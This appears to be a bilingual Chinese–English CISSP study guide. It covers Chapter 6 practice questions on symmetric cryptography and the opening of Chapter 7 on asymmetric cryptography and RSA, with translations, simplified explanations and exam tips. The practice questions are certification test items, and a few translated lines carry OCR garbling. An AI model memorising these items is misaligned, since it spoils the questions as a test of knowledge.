冗余、备份、BCP/DRP、抗 DoS、容量规划都对应可用性。

数字签名、审计日志、交易记录和证书常支持不可否认性。

认证成功不等于什么都能做;权限仍要单独授权。

排除法提醒:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

本页术语拆解
机密性 机密性让该看的人能看,不该看的人看不到。
完整性 完整性保证数据没有被未授权修改,并且仍然正确可信。
可用性 可用性保证授权用户需要时能及时使用系统和数据。
不可否认性 不可否认性让行为人事后不能抵赖自己做过某事。
授权 授权是认证之后决定你能访问什么、能做什么。
加密 加密把内容变成未授权者看不懂的形式。
密码学 密码学用数学方法保护信息,常用于机密性、完整性、认证和不可否认性。
对称加密 对称加密使用同一把密钥加密和解密,速度快但密钥分发难。
学习单元 51 / PDF P422

完整性:数据要正确、可信、未被乱改

完整性不只是防黑客篡改,也包括防授权用户误操作。

教材原文段落

C. Authentication D. Integrity 7. Brian encountered encrypted data left on one of his systems by attackers who were communicating with one another. He has tried many cryptanalytic techniques and was unable to decrypt the data. He believes that the data may be protected with an unbreakable system. When correctly implemented, what is the only cryptosystem known to be unbreakable? A. Transposition cipher B. Substitution cipher C. Advanced Encryption Standard D. One-time pad 8. Helen is planning to use a one-time pad to meet a unique cryptographic requirement in her organization. She is trying to identify the requirements for using this cryptosystem.

Which of the following are requirements for the use of a one-time pad? (Choose all that apply.) A. The encryption key must be at least one-half the length of the message to be encrypted. B. The encryption key must be randomly generated. C. Each one-time pad must be used only once. D. The one-time pad must be physically protected against disclosure. 9. Brian administers a symmetric cryptosystem used by 20 users, each of whom has the ability to communicate privately with any other user. One of those users lost control of their account and Brian believes that user's keys were compromised. How many keys must he change? A. 1 B. 2 C. 19 D. 190 10.

Which one of the following cipher types operates on large pieces of a message rather than individual characters or bits of a message? A. Stream cipher C.

中文直译 / 整理

身份验证 D. 完整性 7. 布莱恩在他的一个系统上发现了攻击者之间通信时留下的加密数据。 他尝 试了多种密码分析技术,但未能解密该数据。 他认为这些数据可能受到一种 不可破解系统的保护。 正确实现时,已知唯一不可破解的密码系统是什么? A. 换位密码 B. 替换密码 C. 高级加密标准 D. 一次性密码本 8. 海伦计划使用一次性密码本以满足其组织中的独特密码学需求。 她正试 图确定使用该密码系统的必要条件。 以下哪项是一次性密码本使用的必要条 件? (选择所有适用项。 ) A. 加密密钥的长度必须至少为待加密消息长度的一半。 B. 加密密钥必须随机生成。 C. 每个一次性密码本只能使用一次。 D. 一次性密码本必须物理保护,防止泄露。 9. 布赖恩管理一个由20名用户使用的对称密码系统,每位用户都能与其他任 何用户进行私密通信。 其中一名用户失去了对其账户的控制,布赖恩认为该 用户的密钥已被泄露。 他必须更改多少个密钥? A. 1 B. 2 C. 19 D. 190 10. 以下哪种密码类型是对消息的较大块进行操作,而不是对单个字符或比特 进行操作? A. 流密码

小白解释

场景先行:想象公司有一个客户订单系统:客户资料被别人看到是机密性问题,订单金额被偷偷改是完整性问题,系统打不开是可用性问题。教材这一页就是教你把事故先翻译成安全目标。

这一页真正想让你理解的是:完整性不只是防黑客篡改,也包括防授权用户误操作。

把它放进公司里看,关键不是背定义,而是判断:把泄露、篡改、宕机混在一起,就会选错控制措施。

你作为负责人可以这样想:先判断事故破坏了 CIA 哪一项,再选择对应控制:防泄露、防篡改、保可用。

本页术语用人话说:

完整性:完整性保证数据没有被未授权修改,并且仍然正确可信。

认证:认证是验证“你是不是你声称的那个人”。

加密:加密把内容变成未授权者看不懂的形式。

NIST:NIST 提供美国常用安全标准、框架和指南。

常见误区:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

读完后用一句话复述:如果我是业务系统负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“完整性:数据要正确、可信、未被乱改”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是业务系统负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

哈希、数字签名、变更控制、输入校验常对应完整性。

密码、令牌、生物特征、多因素认证都服务认证。

加密主要保护机密性,也可配合签名、哈希支持完整性和真实性。

看到 SP 800 系列、CSF、RMF 常联想到 NIST。

Minimum level、mandatory requirement 常对应 standard。

遇到章末题时,不要只看选项。先判断题干在问定义、责任归属、最佳下一步,还是控制措施选择。

排除法提醒:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

本页术语拆解
完整性 完整性保证数据没有被未授权修改,并且仍然正确可信。
认证 认证是验证“你是不是你声称的那个人”。
加密 加密把内容变成未授权者看不懂的形式。
NIST NIST 提供美国常用安全标准、框架和指南。
标准 标准给出必须满足的最低要求。
密码学 密码学用数学方法保护信息,常用于机密性、完整性、认证和不可否认性。
对称加密 对称加密使用同一把密钥加密和解密,速度快但密钥分发难。
OSI 模型 OSI 用七层结构理解网络通信,从物理层到应用层。
学习单元 52 / PDF P423

机密性:让该看的人看,不该看的人看不到

机密性重点是防泄露,同时不能妨碍授权访问。

教材原文段落

B. Caesar cipher C. Block cipher D. ROT3 cipher 11. James is the administrator for his organization's symmetric key cryptographic system. He issues keys to users when the need arises. Mary and Beth recently approached him and presented a need to be able to exchange encrypted files securely with each other. How many keys must James generate? A. One B. Two C. Three D. Four 12. Dave is developing a key escrow system that requires multiple people to retrieve a key but does not depend on every participant being present. What type of technique is he using? A. Split knowledge B. M of N Control C. Work function D. Zero-knowledge proof 13.

What is used to increase the strength of cryptography by creating a unique ciphertext every time the same message is encrypted with the same key? A. Initialization vector (IV) B. Vigenère cipher C. Steganography D. Stream cipher 14. Tammy is choosing a mode of operation for a symmetric cryptosystem that she will be using in her organization. She wants to choose a mode that is capable of providing both confidentiality and data authenticity. What mode would best meet her needs? A. ECB B.

中文直译 / 整理

凯撒密码 C. 分组密码 D. ROT3密码 11. James 是其组织对称密钥加密系统的管理员。 当需要时,他会向用户分 发密钥。 Mary 和 Beth 最近找到他,表示需要能够安全地相互交换加密文 件。 James 需要生成多少个密钥? A. 一个 B. 两个 C. 三 D. 四 12. 戴夫正在开发一个密钥托管系统,该系统需要多人参与才能检索密钥, 但不依赖于每个参与者都必须在场。 他使用的是哪种技术? A. 分割知识 B. M 出 N 控制 C. 工作函数 D. 零知识证明 13. 什么是用于在使用相同密钥加密相同消息时每次都生成唯一密文,从 而增强密码强度的? A. 初始化向量(IV) B. 维吉尼亚密码 C. 隐写术 D. 流密码 14. 塔米正在为对称密码系统选择一种操作模式 她将使用 g 在她的或g组织。 她希望选择一种模式 能够同时提供机密性和数据真实性。 哪种模式最能满足她的需求? A. ECB

小白解释

场景先行:想象公司有一个客户订单系统:客户资料被别人看到是机密性问题,订单金额被偷偷改是完整性问题,系统打不开是可用性问题。教材这一页就是教你把事故先翻译成安全目标。

这一页真正想让你理解的是:机密性重点是防泄露,同时不能妨碍授权访问。

把它放进公司里看,关键不是背定义,而是判断:把泄露、篡改、宕机混在一起,就会选错控制措施。

你作为负责人可以这样想:先判断事故破坏了 CIA 哪一项,再选择对应控制:防泄露、防篡改、保可用。

本页术语用人话说:

机密性:机密性让该看的人能看,不该看的人看不到。

真实性:真实性确认数据、身份或来源是真的,不是假冒的。

加密:加密把内容变成未授权者看不懂的形式。

NIST:NIST 提供美国常用安全标准、框架和指南。

常见误区:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

读完后用一句话复述:如果我是业务系统负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“机密性:让该看的人看,不该看的人看不到”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是业务系统负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

加密、访问控制、分类、培训都常用于保护机密性。

证书、签名、强认证常支持真实性。

加密主要保护机密性,也可配合签名、哈希支持完整性和真实性。

看到 SP 800 系列、CSF、RMF 常联想到 NIST。

加密保护机密性,哈希保护完整性,数字签名支持完整性、真实性和不可否认性。

排除法提醒:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

本页术语拆解
机密性 机密性让该看的人能看,不该看的人看不到。
真实性 真实性确认数据、身份或来源是真的,不是假冒的。
加密 加密把内容变成未授权者看不懂的形式。
NIST NIST 提供美国常用安全标准、框架和指南。
密码学 密码学用数学方法保护信息,常用于机密性、完整性、认证和不可否认性。
对称加密 对称加密使用同一把密钥加密和解密,速度快但密钥分发难。
OSI 模型 OSI 用七层结构理解网络通信,从物理层到应用层。
学习单元 53 / PDF P424

保护机制:分层、隐藏、加密和边界

单一控制不够,安全靠多个机制配合。

教材原文段落

B. GCM C. OFB D. CTR 15. Julie is designing a highly secure system and is concerned about the storage of unencrypted data in RAM. What use case is she considering? A. Data in transit B. Data at rest C. Data in destruction D. Data in use 16. Renee conducted an inventory of encryption algorithms used in her organization and found that they are using all of the algorithms below. Which of these algorithms should be discontinued? (Choose all that apply.) A. AES B. DES C. 3DES D. RC5 17. Which one of the following encryption algorithm modes suffers from the undesirable characteristic of errors propagating between blocks? A. Electronic Codebook mode B. Cipher Block Chaining mode C.

Output Feedback mode D. Galois/Counter mode 18. Which one of the following secret key distribution methods is most cumbersome when users are located in different geographic locations? A. Diffie–Hellman B. Public key encryption C. Offline key distribution D. Key escrow B. GCM C. OFB D. CTR 15. Julie

中文直译 / 整理

正在设计一个高度安全的系统,并担心未加密数据在 RAM 中的存储。 她正在考虑哪种使用场景? A. 传输中的数据 B. 静态数据 C. 处于销毁中的数据 D. 处于使用中的数据 16. 琳娜对组织中使用的加密算法进行了盘点,发现他们正在使用以下所有 算法。 这些算法中哪些应该停用? (可多选) A. AES B. DES C. 3DES D. RC5 17. 以下哪种加密算法模式具有错误在块之间传播的不良特性? A. 电子密码本模式 B. 密码分组链接模式 C. 输出反馈模式 D. 伽罗瓦/计数器模式 18. 以下哪种密钥分发方法在用户位于不同地理位置时最为繁琐? A. Diffie–Hellman B. 公钥加密 C. 离线密钥分发 D. 密钥托管

小白解释

场景先行:你是公司的安全负责人,正在读第 424 页这一组概念。老板不会问你背定义,而是问:这件事会不会影响业务、谁负责、要不要花钱、出了事能不能解释清楚。

这一页真正想让你理解的是:单一控制不够,安全靠多个机制配合。

把它放进公司里看,关键不是背定义,而是判断:概念没放进业务场景,容易只背词,做题时不知道该选管理动作还是技术动作。

你作为负责人可以这样想:先确认业务目标和风险,再选控制措施,最后留下政策、审批、日志或证据。

本页术语用人话说:

加密:加密把内容变成未授权者看不懂的形式。

常见误区:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

读完后用一句话复述:如果我是安全负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“保护机制:分层、隐藏、加密和边界”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是安全负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

加密主要保护机密性,也可配合签名、哈希支持完整性和真实性。

排除法提醒:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

本页术语拆解
加密 加密把内容变成未授权者看不懂的形式。
学习单元 54 / PDF P425

机密性:让该看的人看,不该看的人看不到

机密性重点是防泄露,同时不能妨碍授权访问。

教材原文段落

19. Victoria is choosing an encryption algorithm for use within her organization and would like to choose the most secure symmetric algorithm from a list of those supported by the software package she intends to use. If the package supports the following algorithms, which would be the best option? A. CAST-256 B. 3DES C. RC4 D. SKIPJACK 20. The Jones Institute has six employees and uses a symmetric key encryption system to ensure confidentiality of communications. If each employee needs to communicate privately with every other employee, how many keys are necessary? A. 1 B. 6 C. 15 D. 30 19.

中文直译 / 整理

维多利亚正在为其组织选择一种加密算法,并希望从她打算使用的软件 包支持的算法列表中选择最安全的对称算法。 如果该软件包支持以下算法, 哪个是最佳选择? A. CAST‑256 B. 3DES C. RC4 D. SKIPJACK 20. 琼斯研究所共有六名员工,使用对称密钥加密系统来确保通信的机密性。 如果每位员工都需要与其他每位员工进行私密通信,需要多少个密钥? A. 1 B. 6 C. 15 D. 30

小白解释

场景先行:想象公司有一个客户订单系统:客户资料被别人看到是机密性问题,订单金额被偷偷改是完整性问题,系统打不开是可用性问题。教材这一页就是教你把事故先翻译成安全目标。

这一页真正想让你理解的是:机密性重点是防泄露,同时不能妨碍授权访问。

把它放进公司里看,关键不是背定义,而是判断:把泄露、篡改、宕机混在一起,就会选错控制措施。

你作为负责人可以这样想:先判断事故破坏了 CIA 哪一项,再选择对应控制:防泄露、防篡改、保可用。

本页术语用人话说:

机密性:机密性让该看的人能看,不该看的人看不到。

加密:加密把内容变成未授权者看不懂的形式。

对称加密:对称加密使用同一把密钥加密和解密,速度快但密钥分发难。

OSI 模型:OSI 用七层结构理解网络通信,从物理层到应用层。

常见误区:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

读完后用一句话复述:如果我是业务系统负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“机密性:让该看的人看,不该看的人看不到”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是业务系统负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

加密、访问控制、分类、培训都常用于保护机密性。

加密主要保护机密性,也可配合签名、哈希支持完整性和真实性。

同一密钥、速度快、大数据加密常对应 symmetric。

网络题先定位层次,再判断协议、设备或攻击位置。

排除法提醒:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

本页术语拆解
机密性 机密性让该看的人能看,不该看的人看不到。
加密 加密把内容变成未授权者看不懂的形式。
对称加密 对称加密使用同一把密钥加密和解密,速度快但密钥分发难。
OSI 模型 OSI 用七层结构理解网络通信,从物理层到应用层。
第 7 章 · P427-485 · 59 个学习单元

PKI 和加密应用

OSG10 · Chapter 7 · PKI and Cryptographic Applications · 全文覆盖 + 小白精读 + 画报

第 7 章:PKI 和加密应用

这不是提炼版。本页按 PDF 第 427-485 页连续覆盖第 7 章内容,每个学习单元都包含教材原文段落、PDF 中文直译/整理、小白解释、考点提醒和对应画报。

59个连续学习单元
4格原文 / 直译 / 解释 / 考点
59页覆盖第7章正文与章末练习
小白先讲人话,再做题
学习单元 01 / PDF P427

本章考试范围总览

先知道本章会覆盖哪些考试目标,后面每个概念才知道放在哪个知识域。

教材原文段落

THE CISSP TOPICS COVERED IN THIS CHAPTER INCLUDE: Domain 3:0 Security Architecture and Engineering 3.5 Assess and mitigate the vulnerabilities of security architectures, designs, and solution elements 3.5.4 Cryptographic systems 3.6 Select and determine cryptographic solutions 3.6.1 Cryptographic life cycle (e.g., keys, algorithm selection) 3.6.2 Cryptographic methods (e.g., asymmetric) 3.6.3 Public key infrastructure (PKI) (e.g., quantum key distribution) 3.6.4 Key management practices (e.g., rotation) 3.6.5 Digital signatures and digital certificates (e.g., nonrepudiation, integrity) 3.7 Understand methods of cryptanalytic attacks 3.7.1 Brute force 3.7.2 Ciphertext only 3.7.3 Known plaintext 3.7.4 Frequency analysis 3.7.5 Chosen ciphertext 3.7.6 Implementation attacks 3.7.7 Side-channel 3.7.8 Fault injection 3.7.9 Timing 3.7.10 Man-in-the-middle (MITM) In Chapter 6, “Cryptography and Symmetric Key Algorithms,” we introduced basic cryptography concepts and explored a variety of secret key cryptosystems.

The symmetric cryptosystems discussed in that chapter offer

中文直译 / 整理

本章涵盖的CISSP主题包括: 领域3:0 安全架构与工程 3.5 评估并减轻安全架构、设计和解决方案元素的漏洞 3.5.4 密码系统 3.6 选择并确定密码解决方案 3.6.1 密码生命周期(例如,密钥、算法选择) 3.6.2 加密方法(例如,非对称) 3.6.3 公钥基础设施(PKI)(例如,量子密钥分发) 3.6.4 密钥管理实践(例如,轮换) 3.6.5 数字签名和数字证书(例如,不可否认性性、完整性) 3.7 理解密码分析攻击方法 3.7.1 暴力破解 3.7.2 仅密文 3.7.3 已知明文 3.7.4 频率分析 3.7.5 选择密文 3.7.6 实现攻击 3.7.7 旁道攻击 3.7.8 故障注入 3.7.9 定时 3.7.10 中间人(MITM) 在 第6章,“加密与对称密钥算法”中,我们介绍了基本的加密概念,并探讨 了多种对称密钥加密系统。 该章讨论的对称加密系统提供

小白解释

场景先行:想象公司有一个客户订单系统:客户资料被别人看到是机密性问题,订单金额被偷偷改是完整性问题,系统打不开是可用性问题。教材这一页就是教你把事故先翻译成安全目标。

这一页真正想让你理解的是:先知道本章会覆盖哪些考试目标,后面每个概念才知道放在哪个知识域。

把它放进公司里看,关键不是背定义,而是判断:把泄露、篡改、宕机混在一起,就会选错控制措施。

你作为负责人可以这样想:先判断事故破坏了 CIA 哪一项,再选择对应控制:防泄露、防篡改、保可用。

本页术语用人话说:

完整性:完整性保证数据没有被未授权修改,并且仍然正确可信。

不可否认性:不可否认性让行为人事后不能抵赖自己做过某事。

加密:加密把内容变成未授权者看不懂的形式。

密码学:密码学用数学方法保护信息,常用于机密性、完整性、认证和不可否认性。

常见误区:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

读完后用一句话复述:如果我是业务系统负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“本章考试范围总览”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是业务系统负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

哈希、数字签名、变更控制、输入校验常对应完整性。

数字签名、审计日志、交易记录和证书常支持不可否认性。

加密主要保护机密性,也可配合签名、哈希支持完整性和真实性。

加密保护机密性,哈希保护完整性,数字签名支持完整性、真实性和不可否认性。

同一密钥、速度快、大数据加密常对应 symmetric。

排除法提醒:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

本页术语拆解
完整性 完整性保证数据没有被未授权修改,并且仍然正确可信。
不可否认性 不可否认性让行为人事后不能抵赖自己做过某事。
加密 加密把内容变成未授权者看不懂的形式。
密码学 密码学用数学方法保护信息,常用于机密性、完整性、认证和不可否认性。
对称加密 对称加密使用同一把密钥加密和解密,速度快但密钥分发难。
非对称加密 非对称加密使用公钥/私钥对,便于密钥交换和签名,但速度慢。
数字签名 数字签名用私钥签署摘要,让别人用公钥验证来源和完整性。
公钥基础设施 PKI PKI 用证书、CA、注册、吊销等机制管理公钥信任。
学习单元 02 / PDF P428

第 428 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

fast, secure communication but introduce the substantial challenge of key exchange between previously unrelated parties. This chapter explores the world of asymmetric (or public key) cryptography and the public key infrastructure (PKI) that supports secure communication between individuals who don't necessarily know each other prior to the communication. Asymmetric algorithms provide convenient key exchange mechanisms and are scalable to very large numbers of users, addressing the two most significant challenges for users of symmetric cryptosystems.

This chapter also explores several practical applications of asymmetric cryptography: securing portable devices, email, web communications, and networking. The chapter concludes with an examination of a variety of attacks malicious individuals might use to compromise weak cryptosystems. Asymmetric Cryptography The section “Modern Cryptography” in Chapter 6 introduced the basic principles behind both secret (symmetric) and public (asymmetric) key cryptosystems. You learned that symmetric key cryptosystems require that both communicating parties possess the same shared secret key, creating the problem of secure key distribution.

You also learned that asymmetric cryptosystems avoid this hurdle by using pairs of public and private keys to facilitate secure communication without the overhead of complex key distribution systems. In the following sections, we'll explore the concepts of public key cryptography in greater detail and look at four of the more common asymmetric cryptosystems in use today: Rivest–Shamir–Adleman (RSA), Diffie–Hellman, ElGamal, and elliptic curve cryptography (ECC). We'll also explore the emerging world of quantum cryptography. Public and Private Keys Recall from Chapter 6 that public key cryptosystems assign each user a pair of keys: a public key and a corresponding private key.

As the names imply, public key cryptosystem users make their public keys freely available to anyone with whom they want to communicate. The mere possession of the public key by third parties does not introduce any weaknesses into the cryptosystem. The private key, on the other hand, is reserved for the sole use of the individual or entity who owns the key. Users should not normally share

中文直译 / 整理

快速、安全的通信,但带来了先前无关方之间密钥交换的重大挑战。 本章探讨了非对称(或公钥)加密技术以及公钥基础设施(PKI),这些技术 支持此前并不相识的个体之间进行安全通信。 非对称算法提供了便捷的密钥交 换机制,并可扩展至海量用户,解决了对称密码系统用户面临的两大最严峻挑 战。 本章还探讨了非对称加密的几种实际应用:保护便携设备、电子邮件、网页 通信和网络通信。 本章最后分析了恶意人员可能用来破坏弱密码系统的各种 攻击方式。 非对称加密 第 6 章中的“现代密码学”一节第 6 章介绍了秘密(对称)密钥和公钥(非对 称)密码系统的基ȷȷ本原理。 您了解到,对称密钥密码系统要求通信双方拥有相 同的共享密钥,从而带来了安全密钥分发的问题。 您还了解到,非对称密码系 统通过使用公钥和私钥对来实现安全通信,避免了复杂密钥分发系统的开销。 在以下章节中,我们将更详细地探讨公钥加密的概念,并研究当今常用的四 种非对称加密系统:Rivest–Shamir–Adleman(RSA)、Diffie– Hellman、ElGamal 和椭圆曲线加密(ECC)。 我们还将探索量子加密的 新兴领域。

公钥与私钥 请回顾第6章,公钥密码系统为每个用户分配一对密钥:公钥和对应的私钥。 正 如其名称所示,公钥密码系统的用户会将其公钥免费提供给任何希望与之通信 的人。 第三方拥有公钥并不会对密码系统造成任何弱点。 另一方面,私钥仅保 留给密钥的所有者个人或实体使用。 用户通常不应共享

小白解释

场景先行:财务要把合同发给供应商:不想被别人看懂,要加密;不想被人改金额,要校验完整性;不想对方抵赖,要签名和证书。密码学不是炫技,是解决这些业务信任问题。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:把加密、哈希、签名混在一起,会导致控制目标错位。

你作为负责人可以这样想:机密性用加密,完整性用哈希/签名,身份信任用证书和 PKI。

本页术语用人话说:

加密:加密把内容变成未授权者看不懂的形式。

密码学:密码学用数学方法保护信息,常用于机密性、完整性、认证和不可否认性。

对称加密:对称加密使用同一把密钥加密和解密,速度快但密钥分发难。

非对称加密:非对称加密使用公钥/私钥对,便于密钥交换和签名,但速度慢。

常见误区:哈希不是加密;签名也不是为了隐藏内容。

读完后用一句话复述:如果我是系统架构师,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 428 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是系统架构师在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

加密主要保护机密性,也可配合签名、哈希支持完整性和真实性。

加密保护机密性,哈希保护完整性,数字签名支持完整性、真实性和不可否认性。

同一密钥、速度快、大数据加密常对应 symmetric。

公钥加密、私钥签名是核心记忆点。

CA、RA、证书、CRL、OCSP、信任链都是 PKI 高频点。

排除法提醒:哈希不是加密;签名也不是为了隐藏内容。

本页术语拆解
加密 加密把内容变成未授权者看不懂的形式。
密码学 密码学用数学方法保护信息,常用于机密性、完整性、认证和不可否认性。
对称加密 对称加密使用同一把密钥加密和解密,速度快但密钥分发难。
非对称加密 非对称加密使用公钥/私钥对,便于密钥交换和签名,但速度慢。
公钥基础设施 PKI PKI 用证书、CA、注册、吊销等机制管理公钥信任。
学习单元 03 / PDF P429

第 429 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

their private keys with any other cryptosystem user, outside of key escrow and recovery arrangements. Normal communication between public key cryptosystem users follows the process shown in Figure 7.1. FIGURE 7.1 Asymmetric key cryptography Notice that the process does not require the sharing of private keys. The sender encrypts the plaintext message (P) with the recipient's public key to create the ciphertext message (C). When the recipient opens the ciphertext message, they decrypt it using their private key to view the original plaintext message.

Once the sender encrypts the message with the recipient's public key, no user (including the sender) can decrypt that message without knowing the recipient's private key (the second half of the public-private key pair). This is the beauty of public key cryptography—public keys can be freely shared using insecure communications and then used to create secure communications' channels between users previously unknown to each other. You also learned in the previous chapter that public key cryptography entails a higher degree of computational complexity. Keys used within public key systems must be longer than those used in secret key systems to produce cryptosystems of equivalent strengths.

中文直译 / 整理

他们的私钥给任何其他密码系统用户,除非在密钥托管和恢复安排中。 公钥 密码系统用户之间的正常通信遵循图7.1所示的过程。 图 7.1非对称密钥加密 请注意,该过程不需要共享私钥。 发送方使用接收方的公钥对明文消息(P) 进行加密,以生成密文消息(C)。 当接收方解密密文消息时,他们使用自己 的私钥还原出原始的明文消息。 一旦发送方使用接收方的公钥加密消息,任何用户(包括发送方)都无法在不 知道接收方私钥(公私钥对的第二部分)的情况下解密该消息。 这就是公钥加 密的精妙之处——公钥可以通过不安全的通信渠道自由共享,从而在之前互不 相识的用户之间建立安全的通信通道。 您在上一章中也了解到,公钥加密涉及更高的计算复杂性。 公钥系统中使用的 密钥必须比对称密钥系统中的密钥更长,才能产生等效强度的加密系统。

小白解释

场景先行:财务要把合同发给供应商:不想被别人看懂,要加密;不想被人改金额,要校验完整性;不想对方抵赖,要签名和证书。密码学不是炫技,是解决这些业务信任问题。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:把加密、哈希、签名混在一起,会导致控制目标错位。

你作为负责人可以这样想:机密性用加密,完整性用哈希/签名,身份信任用证书和 PKI。

本页术语用人话说:

加密:加密把内容变成未授权者看不懂的形式。

密码学:密码学用数学方法保护信息,常用于机密性、完整性、认证和不可否认性。

对称加密:对称加密使用同一把密钥加密和解密,速度快但密钥分发难。

非对称加密:非对称加密使用公钥/私钥对,便于密钥交换和签名,但速度慢。

常见误区:哈希不是加密;签名也不是为了隐藏内容。

读完后用一句话复述:如果我是系统架构师,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 429 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是系统架构师在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

加密主要保护机密性,也可配合签名、哈希支持完整性和真实性。

加密保护机密性,哈希保护完整性,数字签名支持完整性、真实性和不可否认性。

同一密钥、速度快、大数据加密常对应 symmetric。

公钥加密、私钥签名是核心记忆点。

排除法提醒:哈希不是加密;签名也不是为了隐藏内容。

本页术语拆解
加密 加密把内容变成未授权者看不懂的形式。
密码学 密码学用数学方法保护信息,常用于机密性、完整性、认证和不可否认性。
对称加密 对称加密使用同一把密钥加密和解密,速度快但密钥分发难。
非对称加密 非对称加密使用公钥/私钥对,便于密钥交换和签名,但速度慢。
学习单元 04 / PDF P430

第 430 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

Because of the high computational requirements associated with public key cryptography, architects often prefer to use symmetric cryptography on anything other than short messages. Later in this chapter, you'll learn how hybrid cryptography combines the benefits of symmetric and asymmetric cryptography. RSA The most famous public key cryptosystem is named after its creators. In 1977, Ronald Rivest, Adi Shamir, and Leonard Adleman proposed the RSA (RivestShamir-Adleman) public key algorithm, which remains a worldwide standard today. They patented their algorithm and formed a commercial venture known as RSA Security to develop mainstream implementations of their security technology.

Today, the RSA algorithm has been released into the public domain and is widely used for secure communication. The RSA algorithm depends on the computational difficulty inherent in factoring the product of large prime numbers. Each user of the cryptosystem generates a pair of public and private keys that are mathematically related using the algorithm described in the following steps: 1. Choose two large prime numbers (approximately 200 digits each), labeled p and q. 2. Compute the product of those two numbers: n = p * q. 3. Select a number, e, that satisfies the following two requirements: a. e is less than n. b.

e and (p – 1)(q – 1) are relatively prime—that is, the two numbers have no common factors other than 1. 4. Find a number, d, such that ed = 1 mod ((p – 1)(q – 1)). 5. Distribute e and n as the public key to all cryptosystem users. Keep d secret as the private key. If Alice wants to send an encrypted message to Bob, she generates the ciphertext (C) from the plaintext (P) using the following formula (where e is

中文直译 / 整理

由于公钥加密具有较高的计算需求,架构师通常更倾向于在除短消息之 外的任何场景中使用对称加密。 本章稍后将介绍混合加密如何结合对称加密 和非对称加密的优势。 RSA 最著名的公钥加密系统以其创建者命名。 1977年,罗纳德·里维斯特、阿迪·萨 莫尔和伦纳德·阿德曼提出了RSA(Rivest-Shamir-Adleman)公钥算法,该算 法至今仍是全球标准。 他们为自己的算法申请了专利,并创立了一家名为RSA Security的商业公司,以开发其安全技术的主流实现。 如今,RSA算法已进入 公共领域,并广泛用于安全通信。 RSA算法依赖于大素数乘积分解所固有的计算难度。 加密系统的每个用户使用 以下步骤中描述的算法生成一对在数学上相关的公钥和私钥: 1. 选择两个大素数(每个约200位数字),标记为p和q。 2. 计算这两个数的乘积:n = p * q。 3. 选择一个满足以下两个条件的数e: a. e小于n。 b. e 和 (p – 1)(q – 1) 互质——即这两个数除了 1 以外没有其他公因数。 4. 找一个数 d,使得 ed = 1 mod ((p – 1)(q – 1))。

5. 将 e 和 n 作为公钥分发给所有密码系统用户。 将 d 作为私钥保密。 如果爱丽丝想向鲍勃发送一条加密消息,她将使用以下公式从明文(P)生成密文 (C)(其中e是

小白解释

场景先行:财务要把合同发给供应商:不想被别人看懂,要加密;不想被人改金额,要校验完整性;不想对方抵赖,要签名和证书。密码学不是炫技,是解决这些业务信任问题。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:把加密、哈希、签名混在一起,会导致控制目标错位。

你作为负责人可以这样想:机密性用加密,完整性用哈希/签名,身份信任用证书和 PKI。

本页术语用人话说:

加密:加密把内容变成未授权者看不懂的形式。

